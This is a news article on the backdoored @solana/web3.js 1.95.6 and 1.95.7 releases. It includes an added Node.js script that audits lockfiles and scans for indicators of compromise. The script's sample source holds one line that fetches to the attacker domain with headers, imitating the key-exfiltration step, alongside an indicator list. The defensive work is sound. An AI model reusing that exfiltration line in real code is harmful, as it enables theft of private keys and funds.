Phantom, a prominent wallet provider in the Solana ecosystem, has reassured its users that it is unaffected by a critical vulnerability recently discovered in the Solana/web3.js library.
The backdoor, found in versions 1.95.6 and 1.95.7, was malicious code designed to steal private keys. It put every application and developer that pulled in either of those versions at risk, potentially exposing user funds to theft.
Phantom’s security team confirmed in a statement on X that the wallet provider has never used these versions in its infrastructure, ensuring its users remain safe.
The vulnerability has sent ripples through the Solana developer community.
Solana developer Trent Sol, who first sounded the alarm, described the compromised versions as a “secret stealer” capable of leaking private keys through what looked like legitimate Cloudflare headers.
He urged developers and projects to immediately upgrade to version 1.95.8 or roll back to unaffected version 1.95.5.
Despite the compromise, major projects such as Drift, Solflare, and Phantom confirmed they were unaffected, either because they never picked up the impacted versions or because additional security layers blocked the exfiltration.
The Bug in Solana Web3.js Library: Who Is Affected?
According to a Socket.dev post, a supply chain attack compromised the Solana/web3.js library, a core component for developers building on Solana.
The attack targeted a dependency that a large share of Solana developers pull in, and inserted a backdoor function named addToQueue into versions 1.95.6 and 1.95.7.
The malicious function exfiltrated private keys while disguising the traffic as legitimate Cloudflare header data.
The captured keys were sent to attacker-controlled infrastructure, and the code also carried a hardcoded Solana wallet address, FnvLGtucz4E1ppJHRTev6Qv4X7g8Pw6WPStHCcbAKbfx, to which stolen funds were directed.
Cybersecurity researchers, including Christophe Tafani-Dereeper from Datadog, analyzed the malicious versions and highlighted the sophisticated nature of the exploit.
They discovered that the domain used for the operation (sol-rpc[.]xyz) had been registered on November 22, just days before the attack became public.
The domain was fronted by Cloudflare; the command-and-control (C2) server behind it is now offline.
This timeline points to a carefully planned attack, most likely enabled by a phishing or social engineering campaign against the library’s maintainers that gave the attacker publish access to the package.
The npm registry, which hosts Solana/web3.js, swiftly removed the compromised versions.
Developers who had installed the affected versions were advised to update to version 1.95.8 immediately (or pin the unaffected 1.95.5) and to audit their lockfiles and node_modules for the compromised versions, including copies pulled in transitively by other dependencies.
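The audit step above is easy to get wrong because a transitive dependency can pin its own copy of @solana/web3.js even when the root package.json is already on a safe version. The following Node.js script is an added example written for this article, not code from the article, from Socket, or from the @solana/web3.js project. It walks a package-lock.json (both the lockfileVersion 2/3 "packages" map and the legacy nested "dependencies" tree) for the two compromised releases, and checks dependency source text for the three indicators the article names. The lockfile, the "some-sdk" package in it, and the source snippet are constructed for the example; the domain is matched in its real form (sol-rpc.xyz) rather than the defanged form used in the text.

```javascript
// Added example (not code from the article or the @solana/web3.js project):
// audit a package-lock.json for the compromised @solana/web3.js releases the
// article names, and scan dependency source for the indicators it lists.

const PACKAGE_NAME = '@solana/web3.js';
const AFFECTED_VERSIONS = new Set(['1.95.6', '1.95.7']); // backdoored releases
const RECOMMENDED_VERSION = '1.95.8';                      // fixed release

// Indicators quoted in the article. The domain is written defanged there
// (sol-rpc[.]xyz); code would contain the real form, so we match that.
const INDICATORS = [
  'addToQueue',                                   // backdoor function name
  'sol-rpc.xyz',                                  // exfiltration domain
  'FnvLGtucz4E1ppJHRTev6Qv4X7g8Pw6WPStHCcbAKbfx', // hardcoded wallet address
];

// Return every copy of PACKAGE_NAME in the lockfile that is at an affected
// version. Nested copies matter: a transitive dependency can pin its own
// copy regardless of what the root package.json requests.
function findAffectedPackages(lock) {
  const hits = [];

  // lockfileVersion >= 2: flat map keyed by "node_modules/..." paths.
  for (const [path, entry] of Object.entries(lock.packages || {})) {
    if (path.endsWith('node_modules/' + PACKAGE_NAME) &&
        AFFECTED_VERSIONS.has(entry.version)) {
      hits.push({ path, version: entry.version });
    }
  }

  // lockfileVersion 1: nested "dependencies" objects. Only walked when there
  // is no "packages" map, so v2 lockfiles (which carry both) are not double
  // counted.
  const walk = (deps, prefix) => {
    for (const [name, entry] of Object.entries(deps || {})) {
      const path = prefix + 'node_modules/' + name;
      if (name === PACKAGE_NAME && AFFECTED_VERSIONS.has(entry.version)) {
        hits.push({ path, version: entry.version });
      }
      walk(entry.dependencies, path + '/');
    }
  };
  if (!lock.packages) walk(lock.dependencies, '');

  return hits;
}

// Return the indicators that appear in a chunk of dependency source text
// (for example the contents of a file under node_modules).
function scanSourceForIndicators(source) {
  return INDICATORS.filter((ioc) => source.includes(ioc));
}

// Combine both checks into one report with the remediation the article gives.
function auditReport(lock, source) {
  const affected = findAffectedPackages(lock);
  const iocs = scanSourceForIndicators(source);
  return {
    affected,
    iocs,
    clean: affected.length === 0 && iocs.length === 0,
    advice: affected.length > 0
      ? `upgrade ${PACKAGE_NAME} to ${RECOMMENDED_VERSION} (or pin 1.95.5) and rotate any keys the affected build could have seen`
      : 'no affected versions found',
  };
}

// Constructed sample lockfile (not from a real project): the root pins a safe
// version, but the hypothetical "some-sdk" package pulls in 1.95.7.
const SAMPLE_LOCK = {
  lockfileVersion: 3,
  packages: {
    '': { dependencies: { '@solana/web3.js': '^1.95.5', 'some-sdk': '^2.0.0' } },
    'node_modules/@solana/web3.js': { version: '1.95.5' },
    'node_modules/some-sdk': { version: '2.0.0' },
    'node_modules/some-sdk/node_modules/@solana/web3.js': { version: '1.95.7' },
  },
};

// Constructed snippet standing in for a file under node_modules. It contains
// two of the indicators and is not the real malicious payload.
const SAMPLE_SOURCE =
  'function addToQueue(h){fetch("https://sol-rpc.xyz/",{headers:h})}';

console.log(JSON.stringify(auditReport(SAMPLE_LOCK, SAMPLE_SOURCE), null, 2));
```

To run it against a real project, replace SAMPLE_LOCK with `JSON.parse(fs.readFileSync('package-lock.json', 'utf8'))` and feed each file under node_modules to scanSourceForIndicators. The version check is the reliable one: the indicator scan only catches the specific strings the article reports, so a clean scan does not by itself prove a build was never exposed.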
Broader Implications for Solana and Web3 Security
The Solana ecosystem has responded rapidly to mitigate the fallout.
In addition to Phantom, major projects like Backpack have assured their users that the exploit does not affect them.
Supply chain attacks like this have become increasingly common as malicious actors target the tools and libraries developers rely on.
Earlier this year, a similar attack involved a malicious Python package named “Solana-py,” which posed as a legitimate Solana API client in order to steal wallet keys.
Similarly, in October this year, the Checkmarx threat research team uncovered a malware campaign on the Python Package Index (PyPI) that targeted cryptocurrency users through a malicious package named “CryptoAITools.”
The malware masquerades as a legitimate cryptocurrency trading tool and uses a deceptive graphical user interface to distract victims while it carries out malicious activity on Windows and macOS systems.
Once installed, the malware launches a sophisticated multi-stage infection process, downloading additional components from a fake website and stealing sensitive data such as wallet recovery phrases, saved passwords, browsing history, and even Apple Notes on macOS.
Beyond the initial infection through PyPI, the campaign extends to other platforms, employing multiple social engineering tactics to lure victims.